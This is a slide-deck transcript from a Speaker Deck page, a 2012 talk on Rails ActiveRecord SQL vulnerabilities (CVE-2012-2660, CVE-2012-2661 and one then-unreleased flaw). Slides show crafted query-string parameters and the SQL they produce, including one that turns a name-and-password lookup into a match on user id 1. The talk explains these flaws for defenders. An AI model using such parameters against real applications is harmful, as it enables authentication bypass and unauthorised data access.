Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins Justin Collins
April 23, 2015
Programming
0
65

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
Avatar for Justin Collins presidentbeef
0
130
The Evolution of Rails Security
Avatar for Justin Collins presidentbeef
1
790
Brakeman RailsConf 2017 Lightning Talk
Avatar for Justin Collins presidentbeef
0
130
Practical Static Analysis for Continuous Application Security
Avatar for Justin Collins presidentbeef
0
190
"...But Doesn't Rails Take Care of Security for Me?"
Avatar for Justin Collins presidentbeef
1
420
Continuous Security with Practical Static Analysis
Avatar for Justin Collins presidentbeef
1
300
Security Automation at Twitter - Rise of the Machines
Avatar for Justin Collins presidentbeef
0
220
The World of Rails Security - RailsConf 2015
Avatar for Justin Collins presidentbeef
8
1.2k
Tales from the Crypt
Avatar for Justin Collins presidentbeef
1
230

Other Decks in Programming

See All in Programming
TypeScriptのmoduleオプションを改めて整理する
Avatar for おおいし bicstone
4
400
TSConfigからTypeScriptの世界を覗く
Avatar for らいと planck16
2
1.2k
TVer iOSチームの共通認識の作り方 - Findy Job LT iOSアプリ開発の裏側 開発組織が向き合う課題とこれから
Avatar for TVer Inc. techtver
PRO
0
640
私のRubyKaigi 2025 Kaigi Effect / My RubyKaigi 2025 Kaigi Effect
Avatar for chobishiba chobishiba
1
200
Reactive Thinking with Signals, Resource API, and httpResource @Devm.io Angular 20 Launch Party
Avatar for Manfred Steyer manfredsteyer
PRO
0
120
インターフェース設計のコツとツボ
Avatar for おぎ togishima
2
410
型付け力を強化するための Hoogle のすゝめ / Boosting Your Type Mastery with Hoogle
Avatar for TAKASE Kazuyuki guvalif
1
220
バランスを見極めよう!実装の意味を明示するための型定義 TSKaigi 2025 Day2 (5/24)
Avatar for whatasoda whatasoda
2
750
少数精鋭エンジニアがフルスタック力を磨く理由 -そしてAI時代へ-
Avatar for 株式会社Rebase_エンジニアリング rebase_engineering
0
120
Use Perl as Better Shell Script
Avatar for karupanerura karupanerura
0
570
Devinで実践する!AIエージェントと協働する開発組織の作り方
Avatar for Masahiro Nishimi masahiro_nishimi
6
2.2k
TypeScript Language Service Plugin で CSS Modules の開発体験を改善する
Avatar for mizdra mizdra
PRO
3
2.2k

Featured

See All Featured
ReactJS: Keep Simple. Everything can be a component!
Avatar for Pedro Nauck pedronauck
667
120k
[RailsConf 2023] Rails as a piece of cake
Avatar for Vladimir Dementyev palkan
55
5.6k
Sharpening the Axe: The Primacy of Toolmaking
Avatar for Bryan Cantrill bcantrill
42
2.3k
How STYLIGHT went responsive
Avatar for nonsquared nonsquared
100
5.6k
Navigating Team Friction
Avatar for Lara Hogan lara
185
15k
Practical Orchestrator
Avatar for Shlomi Noach shlominoach
187
11k
Embracing the Ebb and Flow
Avatar for Simon Collison colly
85
4.7k
Done Done
Avatar for chrislema chrislema
184
16k
A designer walks into a library…
Avatar for Paul Jervis Heath pauljervisheath
205
24k
Typedesign – Prime Four
Avatar for Hannes Fritz hannesfritz
41
2.6k
Into the Great Unknown - MozCon
Avatar for Noah Learner thekraken
38
1.8k
jQuery: Nuts, Bolts and Bling
Avatar for Doug Neiner dougneiner
63
7.8k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1